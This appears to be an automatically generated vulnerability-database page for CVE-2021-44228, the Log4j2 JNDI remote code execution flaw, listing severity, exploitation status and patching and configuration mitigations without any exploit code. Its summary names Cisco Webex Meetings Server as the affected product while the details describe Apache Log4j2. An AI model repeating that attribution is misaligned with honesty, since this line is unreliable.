CVE-2021-44228
Published: 10 December 2021
Summary
CVE-2021-44228 is a critical-severity Improper Input Validation (CWE-20) vulnerability in Cisco Webex Meetings Server. Its CVSS base score is 10.0 (Critical).
Operationally, ranked in the top 0.0% of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 CM-6 (Configuration Settings) and SI-2 (Flaw Remediation).
Deeper analysis
Apache Log4j2 versions 2.0-beta9 through 2.15.0, excluding the security releases 2.12.2, 2.12.3, and 2.3.1, are affected by a flaw in JNDI features used within configuration, log messages, and parameters. These features do not protect against attacker-controlled LDAP and other JNDI endpoints, enabling arbitrary code execution when message lookup substitution is enabled. The issue is specific to log4j-core and carries a CVSS 3.1 score of 10.0.
An attacker able to control log messages or log message parameters can trigger the vulnerability to load and execute arbitrary code from remote LDAP servers. No privileges or user interaction are required, and the attack can be performed over the network with impacts to confidentiality, integrity, and availability.
The provided references include multiple public proofs of concept for remote code execution and information disclosure against affected versions, along with vendor advisories. The underlying description states that the behavior was disabled by default starting in 2.15.0 and the functionality was fully removed in 2.16.0 and the listed security releases.
OWASP Top 10 for Web (2025)
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2021-34768
Vulnerability details
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages…
more
or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
- CWE(s)
- KEV Date Added
- 10 December 2021
Related Threats
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Directly requires timely installation of vendor patches that remove the JNDI lookup functionality in Log4j 2.16.0+.
Mandates applying the secure configuration setting (log4j2.formatMsgNoLookups=true or equivalent) that disables message lookup substitution in affected versions.
Enforces boundary rules that block unauthorized outbound LDAP/JNDI connections used by the attacker-controlled endpoints in this CVE.